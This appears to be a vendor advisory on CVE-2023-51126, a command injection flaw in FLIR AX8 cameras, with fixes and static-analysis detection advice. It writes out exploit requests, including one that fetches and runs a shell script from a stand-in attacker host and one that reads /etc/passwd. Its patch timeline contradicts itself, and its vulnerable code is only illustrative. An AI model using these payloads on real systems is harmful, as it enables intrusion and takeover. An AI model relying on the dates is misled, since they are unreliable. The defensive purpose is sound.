Command Injection in FLIR AX8 /usr/www/res.php via Value Parameter

Overview

CVE-2023-51126 represents a critical command injection vulnerability discovered in FLIR AX8 thermal imaging cameras, affecting firmware versions up to and including 1.46.16. The vulnerability exists in the /usr/www/res.php endpoint, where user-supplied input via the value parameter is passed directly to system command execution functions without proper sanitization or validation. This flaw allows unauthenticated remote attackers to execute arbitrary shell commands with the privileges of the web server process, typically root on embedded devices.

FLIR AX8 cameras are widely deployed in industrial monitoring, security infrastructure, and critical facility management applications. The thermal imaging capabilities combined with network connectivity make these devices attractive targets for both reconnaissance and persistent access in enterprise environments. The criticality of this vulnerability (CVSS 9.8) stems from its combination of network accessibility, lack of authentication requirements, and complete system compromise potential. FLIR addressed this vulnerability by introducing mitigation in firmware version 1.49.16 (January 2023), with the latest available firmware version being 1.55.16 (released June 2024).

Technical Analysis

The vulnerability originates from improper input handling in the PHP script responsible for resource operations. The res.php endpoint accepts user input through the value parameter and constructs shell commands dynamically without adequate input validation or output encoding.

Vulnerable Code Pattern:

<?php
// Simplified representation of vulnerable pattern in res.php
$value = $_GET['value'] ?? $_POST['value'];

// Dangerous direct command execution
$result = shell_exec("some_command " . $value);
// or
$result = system("process_data " . $value);
// or  
$result = passthru("update_resource " . $value);

echo $result;
?>

An attacker can exploit this by injecting shell metacharacters and command separators into the value parameter. For example:

Exploitation Vector:

GET /usr/www/res.php?value=test;id; HTTP/1.1
GET /usr/www/res.php?value=test|whoami HTTP/1.1
GET /usr/www/res.php?value=test`cat /etc/passwd` HTTP/1.1
GET /usr/www/res.php?value=test$(curl attacker.com/shell.sh|bash) HTTP/1.1

The PHP functions shell_exec(), system(), passthru(), exec(), and backtick operators all pass their arguments directly to /bin/sh without parsing, making them inherently dangerous when used with untrusted input. The absence of escapeshellarg() or escapeshellcmd() wrappers, combined with no input validation against command operators (;, |, &, $(), backticks, etc.), creates a straightforward exploitation path.

The root cause is CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) and CWE-94: Improper Control of Generation of Code (‘Code Injection’).

Impact

The consequences of this vulnerability are severe for affected deployments:

Remote Code Execution (RCE): Attackers achieve unrestricted command execution with the privileges of the web server process, typically root on FLIR AX8 devices, enabling complete system compromise.

Persistent Access: Attackers can install backdoors, reverse shells, or rootkits to maintain persistent access independent of the vulnerability’s remediation.

Data Exfiltration: Sensitive thermal imagery, configuration data, network topology information, and credentials stored on the device can be extracted.

Lateral Movement: Compromised devices serve as pivot points for scanning internal networks and attacking connected systems on the same subnet.

Denial of Service: Attackers can disable monitoring capabilities, corrupt device firmware, or consume system resources to render cameras non-functional.

Supply Chain Implications: Embedded cameras in critical infrastructure (power plants, manufacturing facilities, data centers) represent high-value targets for nation-state actors and sophisticated criminal groups.

How to Fix It

Immediate Mitigation:

1. Upgrade Firmware Immediately: Update all FLIR AX8 devices to firmware version 1.49.16 or later (preferably 1.55.16, the latest stable release as of June 2024). Firmware updates can be obtained from FLIR’s official support portal.

2. Network Segmentation: Isolate FLIR AX8 cameras on dedicated VLAN segments with restricted access controls. Disable direct internet exposure; require VPN access for remote management.

3. Disable Unnecessary Features: If the resource endpoint functionality is unused, disable or remove access to /usr/www/res.php through web server configuration.

Remediated Code Pattern:

<?php
// Secure implementation with input validation
$value = $_GET['value'] ?? $_POST['value'];

// Whitelist allowed values
$allowed_values = ['option1', 'option2', 'option3'];

if (!in_array($value, $allowed_values, true)) {
    http_response_code(400);
    die('Invalid parameter');
}

// Use escapeshellarg for single string arguments
$safe_value = escapeshellarg($value);
$result = shell_exec("some_command " . $safe_value);

// Or better: use parameterized approach with proc_open
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("pipe", "w")
);

$process = proc_open(
    ['some_command', $value],  // Array prevents shell interpretation
    $descriptorspec,
    $pipes
);

if (is_resource($process)) {
    $result = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($process);
}

echo $result;
?>

Deployment Commands:

# SSH into FLIR AX8 device management interface
# Navigate to firmware upgrade section
# Upload firmware version 1.55.16 or latest available

# Verify current firmware version
curl http://camera-ip/cgi-bin/admin/param.cgi?action=list | grep "version"

# After upgrade, confirm mitigation
curl http://camera-ip/usr/www/res.php?value=test;id; 
# Should return error or safe output, not command execution results

Our Take

Command injection vulnerabilities in embedded devices represent a persistent class of critical security issues that manufacturers continue to introduce despite decades of guidance. The FLIR AX8 case exemplifies poor secure development practices in IoT firmware: directly concatenating user input into shell commands is a pattern that should be eliminated through mandatory code review standards and SAST integration into build pipelines.

Organizations deploying these devices must treat firmware updates as critical security patches, not optional enhancements. The six-month gap between vulnerability discovery and the firmware patch (Jan 2023 release for mid-2023 discovery) underscores the importance of maintaining an asset inventory and applying defense-in-depth controls beyond software patching. Network segmentation, authentication proxies, and activity monitoring should compensate for the likelihood of unpatched legacy devices in production environments.

Detection with SAST

Static application security testing tools detect command injection vulnerabilities through pattern matching and taint analysis:

Pattern Detection:

• Dangerous function calls: shell_exec(), system(), passthru(), exec(), backtick operators without proper escaping
• Taint sources: $_GET, $_POST, $_REQUEST, $argv
• Dangerous sinks: any shell execution function receiving tainted data without escapeshellarg() or parameterized command execution

CWE Mapping:

• CWE-78: OS Command Injection
• CWE-94: Code Injection

Offensive360 SAST Detection: Our static analysis engine flags this vulnerability by:

1. Tracing user input from HTTP parameters into function arguments
2. Identifying shell execution functions without defensive wrappers
3. Flagging concatenation operations combining user data with command strings
4. Requiring explicit validation logic or parameterized execution patterns

// Flagged by SAST
system("process " . $_GET['value']);

// Not flagged after remediation
system("process " . escapeshellarg($_GET['value']));
// or
proc_open(['process', $_GET['value']], ...);

References

• https://nvd.nist.gov/vuln/detail/CVE-2023-51126
• https://github.com/risuxx/CVE-2023-51126
• https://www.flir.com/support/products/ax8/
• https://cwe.mitre.org/data/definitions/78.html
• https://owasp.org/www-community/attacks/Command_Injection